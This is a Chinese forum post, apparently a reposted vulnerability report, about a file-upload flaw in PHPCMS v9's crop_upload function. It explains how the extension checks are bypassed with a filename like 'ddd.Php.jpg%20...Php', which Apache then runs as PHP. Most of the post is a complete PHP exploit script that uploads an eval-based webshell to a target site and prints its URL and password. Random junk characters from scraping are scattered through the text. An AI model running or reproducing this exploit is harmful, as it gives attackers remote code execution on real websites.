漏洞类型: 文件上传导致任意代码执行
5 O. T" E+ j0 j0 n2 T' p
0 ^9 }% q" R [& ]7 Z7 @8 e简要描述:
& w, J# Y+ y! N' F
) w* R0 K1 r7 A7 R: o; t) Ephpcms v9 getshell (apache)
^6 _1 b) u) j3 Q3 f, X+ j详细说明:
4 _$ t- D% _% O- J' i
; y, `( l2 G5 V3 {漏洞文件:phpcms\modules\attachment\attachments.php
- A& K" o" T: l
2 Y5 V& Q: b$ W- O: I9 K& ^public function crop_upload() { (isset($GLOBALS["HTTP_RAW_POST_DATA"])) { $pic = $GLOBALS["HTTP_RAW_POST_DATA"]; if (isset($_GET['width']) && !empty($_GET['width'])) { $width = intval($_GET['width']); } if (isset($_GET['height']) && !empty($_GET['height'])) { $height = intval($_GET['height']); } if (isset($_GET['file']) && !empty($_GET['file'])) { $_GET['file'] = str_replace(';','',$_GET['file']);//过滤了分号 if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();//is_image()检测是个关键 if (strpos($_GET['file'], pc_base::load_config('system', 'upload_url'))!==false) { $file = $_GET['file']; $basenamebasename = basename($file);//获取带有后缀的文件名 if (strpos($basename, 'thumb_')!==false) { $file_arr = explode('_', $basename); $basename = array_pop($file_arr); } $new_file = 'thumb_'.$width.'_'.$height.'_'.$basename; } else { pc_base::load_sys_class('attachment','',0); $module = trim($_GET['module']); $catid = intval($_GET['catid']); $siteid = $this->get_siteid(); $attachment = new attachment($module, $catid, $siteid); $uploadedfile['filename'] = basename($_GET['file']); $uploadedfile['fileext'] = fileext($_GET['file']); if (in_array($uploadedfile['fileext'], array('jpg', 'gif', 'jpeg', 'png', 'bmp'))) { $uploadedfile['isimage'] = 1; } $file_path = $this->upload_path.date('Y/md/'); pc_base::load_sys_func('dir'); dir_create($file_path); $new_file = date('Ymdhis').rand(100, 999).'.'.$uploadedfile['fileext']; $uploadedfile['filepath'] = date('Y/md/').$new_file; $aid = $attachment->add($uploadedfile); } $filepath = date('Y/md/'); file_put_contents($this->upload_path.$filepath.$new_file, $pic);//文件名可控、$pic可控 } else { return false; } echo pc_base::load_config('system', 'upload_url').$filepath.$new_file; exit; } } $ _1 C, O4 f- t$ _9 f
后缀检测:phpcms\modules\attachment\functions\global.func.php! @. o. p- y* f7 A. w& P' X: H
( D4 d, C6 ?' n( m5 E
5 l( r/ E) H6 {$ t) o. X
* n5 y3 ?3 T7 afunction is_image($file) { $ext_arr = array('jpg','gif','png','bmp','jpeg','tiff'); $ext = fileext($file);关键地方 return in_array($ext,$ext_arr) ? $ext_arr :false; }
5 @/ H0 N5 L1 |2 g4 @9 }" K3 k0 o2 ^) ?; w- m. g
关键函数:9 w. N2 \! F0 p; l& h- B# x' G! a
4 ] ]5 P* d# P3 X3 D+ N' U+ w
+ F! f8 g! G2 E l- o! {, c8 k# T4 e
! D9 r2 i& b, `7 N9 p. kfunction fileext($filename) { return strtolower(trim(substr(strrchr($filename, '.'), 1, 10))); } % R6 [& o3 B* M& R+ d# i
# A+ T- ~/ h+ f1 D8 `
Fileext函数是对文件后缀名的提取。
5 m; ?. n2 U6 F2 x: C {根据此函数我们如果上传文件名为ddd.Php.jpg%20%20%20%20%20%20%20Php& E4 f! o* k: @% ]; [6 W& E
经过此函数提取到的后缀还是jpg,因此正在is_image()函数中后缀检测被绕过了。2 f" |0 ]5 U( b6 Z z: u7 k& i/ w) g
我们回到public function crop_upload() 函数中- I+ `# [8 S- C, R4 H
if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();, }/ A5 `# V& T( t3 t+ q
在经过了is_image的判断之后又来了个.php的判断,在此程序员使用的是strpos函数
! g; c' B* |6 F* n- {. r' a这个函数是对大小写敏感的函数我们使用.Php就可以直接绕过了。3 J/ s: G; ?- {
经过上边的两层的过滤我们的ddd.Php.jpg%20%20%20%20%20%20%20Php后缀依然有效。
* Q, T; d8 Z" ]. ]/ }% z最后$basename变量的值就为ddd.Php.jpg%20%20%20%20%20%20%20Php 然后使用file_put_contents函数写入到了指定目录。
( X4 S3 u; ?/ h. q O) F看见ddd.Php.jpg%20%20%20%20%20%20%20Php这个后缀,大家应该明白了,它用在apache搭建的服务器上可以被解析。. W7 t/ ?& [4 K# k2 z
漏洞证明:( R9 D, X. B% A: W4 C0 b
" l) [2 a! R4 b$ o0 @4 @" bexp:
& o1 {' n! P7 o3 r& i3 b0 E- H8 J( @
<?php# F2 e8 W; Q; F" q, L o. T
error_reporting(E_ERROR);# a R* \4 W, [* w. l& i8 k8 h8 J
set_time_limit(0);
; h% D# b6 Z$ e, M. h3 ~$pass="ln";8 ^ J9 z, f! Z0 x/ ^+ Q, @( p; Y/ ~. f
print_r('4 ~/ j/ z0 a; e$ t3 R0 U
+---------------------------------------------------------------------------+
) g. Y1 q; r% K7 DPHPCms V9 GETSHELL 0DAY 6 k7 b q6 W; F( F: W( t9 _5 V
code by L.N.# o# C! s6 ^2 b9 H
4 _" s; ?1 b+ x# J- r; u4 Hapache 适用(利用的apache的解析漏洞) // 云安全 www.yunsec.net
3 x% `% r2 n- p- ?% \" D+---------------------------------------------------------------------------+2 M5 c) y, |9 l) H b
');
9 x: g7 M' }2 ` _9 Hif ($argc < 2) {' S0 Z( J$ @$ }6 @2 c
print_r('
* b6 N6 `# p) c% O+---------------------------------------------------------------------------+4 A3 j/ c; [/ p
Usage: php '.$argv[0].' url path
& _ D- E$ @- {) Z, j. P
1 _/ Z3 ^: \) h4 e5 GExample:
3 ^9 m& q8 O3 q+ T) c/ b1 |1.php '.$argv[0].' lanu.sinaapp.com% `' ?1 f7 |% q' X( a0 Q/ S, G: f* U
2.php '.$argv[0].' lanu.sinaapp.com /phpcms) R4 F5 e% `2 x
+---------------------------------------------------------------------------+
7 u/ G' Y& m2 v, h- l$ g5 m');
) h3 u; x( E, |exit;
% s3 |, D* \1 X1 B K% r. f/ Y}
r* q6 r% X% x S6 f( w' u$ V. M. v
$url = $argv[1];
V5 V' `: G/ M2 P# L* K$path = $argv[2];: i3 t& ]) |( _. l$ Y2 y) y. i
$phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';( [, i! ~+ _7 |
$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';
o; q; D# W x0 ?! x, D8 aif($ret=Create_dir($url,$path))
* f8 g: n( M/ R6 J2 `5 \{& Q' p; a! M7 D! h9 U* @
//echo $ret;7 C( \0 N1 m2 N
$pattern = "|Server:[^,]+?|U";: p' ~+ u/ o5 B5 _
preg_match_all($pattern, $ret, $matches);
& R: U2 `1 n$ k2 s; jif($matches[0][0])
! e6 E! `& I" a: g9 |$ a{ n! i6 y7 H( G
if(strpos($matches[0][0],'Apache') == false)2 A- k$ j3 I& K! g
{# d" U3 ]" i* `
echo "\n亲!此网站不是apache的网站。\n";exit;8 |0 x9 y: u# X9 E% J m/ K+ `$ f
}" n/ n" `$ H7 ~ N! I* M% r9 Q
}
' c, N5 Z5 [- y% x7 c$ret = GetShell($url,$phpshell,$path,$file);3 p! V$ w0 r+ `
$pattern = "|http:\/\/[^,]+?\.,?|U";- K- W+ S. R- v/ n5 q9 y3 a; [; b0 |5 U
preg_match_all($pattern, $ret, $matches);* Z/ t: C. [" T$ [9 m
if($matches[0][0])
' x, g+ L4 W8 e{
8 L* d6 f! M! L0 vecho "\n".'密码为: '.$pass."\n";
/ I4 ?. ?$ |' T5 necho "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;9 @$ _. w! V7 ^! y/ C" h, }( E
}
8 {% q+ U2 { z+ |* Velse% ]- W4 A7 z3 f* W" P( T) U
{
l1 O: [' b# ?: C: \8 A' J$pattern = "|\/uploadfile\/[^,]+?\.,?|U";8 |$ E8 Y" F2 V/ {( H$ v* j
preg_match_all($pattern, $ret, $matches);% G% o! w7 r* ~
if($matches[0][0])
; i/ R ^( w6 [* ^5 H0 V8 `) V{9 B' |$ X) ~- T7 g! q
echo "\n".'密码为: '.$pass."\n";3 X1 x8 z6 n6 ]' T( J, ~) g
echo "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
' P8 p& S( d {/ i2 k7 W( O; g# c}
+ Q) B: _* Z3 i$ Z7 |. f: k% delse
# j q! _; }" i; W" {{
3 |% t! }3 D' A* g! o w) ]" Necho "\r\n没得到!\n";exit;
& `9 P7 D y5 T2 O- i+ L; S}
' a; D0 J- V/ g}
6 {0 s4 V9 w' ~" M0 H; c) `( D}
3 r& A4 T: g% {; V9 B4 Y% o1 y# H, ^
function GetShell($url,$shell,$path,$js)
; Z7 I1 U: \7 q' P* G{
8 y' A# _% P, J" w) m' h$content =$shell;
& Z1 m8 D# s! m2 f& l% q3 |% j3 j$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n";
8 m$ F6 z# l c" Z2 {, E$data .= "Host: ".$url."\r\n";
* r% C3 a1 W- h1 ]$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
* q7 ` @2 O2 n, W4 B! t; {2 H$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";% y1 B1 }' N- z
$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";% Q* A$ M' G X! f
$data .= "Connection: close\r\n";
' X3 r `2 A4 W" c1 X$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
5 ], P% c c3 n3 \0 y e$data .= $content."\r\n";2 z" {, y: x" ~" O3 n- k
$ock=fsockopen($url,80);
9 ]3 B; r4 K) B, [6 ?/ Z Oif (!$ock)
$ Z4 a: U- a( ~- ~8 ]9 z2 z{
9 p2 C4 i9 R; x- yecho "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
& Q; @2 }1 q, ^1 }6 ^% X}- o, x, v* u3 T& U. ^5 Y9 @
else& S4 o7 R: m6 E* B& Y, V
{* i0 b) h5 q; U$ g2 W; Q
fwrite($ock,$data);, X5 H7 P# k" J: |6 Q
$resp = '';
) ?0 J0 f8 |* B' ~) J, u7 b8 Wwhile (!feof($ock))
& x/ g m N$ C+ T{
5 k; D& x- @4 C# ~. l2 z7 G$resp.=fread($ock, 1024);5 y3 ]2 |+ h5 L' ]5 `
}9 D" Z4 N6 J' r6 P
return $resp;9 a5 ]$ {" ^& S9 Y# R9 H
}
! q' J5 O7 \- z8 ~. F! x}( Q8 n. q* p v
1 e2 a- v' l; b5 K2 Q, b2 m4 bfunction Create_dir($url,$path='')( c6 p" Z1 N+ m6 ~- j4 Z" E" c* \
{
; w9 d# b" ^5 ?7 o" b/ J! t$content ='I love you';' p- E$ c0 j6 j4 b
$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";) }$ n" b! ?1 [ v+ ?$ y! f1 z
$data .= "Host: ".$url."\r\n";
; r( Y+ D% n% D2 W0 Q$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
X/ X5 J. Z5 Y$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";& D6 k1 q, W1 U: a' R- I
$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";: o( Z# H3 J* r0 W
$data .= "Connection: close\r\n";
, y, V5 Y* d$ `: {, M0 W$data .= "Content-Length: ".strlen($content)."\r\n\r\n";: A$ f2 p; L- c- c9 Z' k* d
$data .= $content."\r\n";1 o7 i. W. c" r+ c0 p/ J1 U
$ock=fsockopen($url,80);
! M2 ~, k+ n/ {if (!$ock)' Z' x& N9 v; ?
{& X3 V$ L# g; H% h, }
echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;' Z- I& N4 s1 {$ g- U! K4 |
}" {% E2 L+ h/ B, _2 G) m& w2 L& p
fwrite($ock,$data);
" b, r2 z3 R+ W) @& W1 T4 P$resp = '';2 {% U$ i, Q- d7 c. Y+ K) K6 W
while (!feof($ock))8 ~5 W' g5 `0 }
{1 ?9 d* A2 n9 l1 L2 J; C6 O
$resp.=fread($ock, 1024);6 g; u h' G3 e1 h
}4 F$ }, J3 o8 h2 w
return $resp;
' L% F' z* l$ z, ~! h0 m}# M' o) _, s4 I5 ]7 e5 d- C. M
?> % j& e4 u1 j/ `1 d, s1 E$ O$ R
6 t, C8 L$ l2 R. p; m
修复方案:
3 `6 L% v5 A4 R. j4 V- p/ w' ]7 ?0 d: ]; g2 P& _$ s
过滤过滤再过滤7 j7 S7 h; ^$ D' p6 `! }# b
! Y/ `# ^% [8 b8 [* u, |
|
发表于 2013-3-7 13:06:41
收藏
支持
反对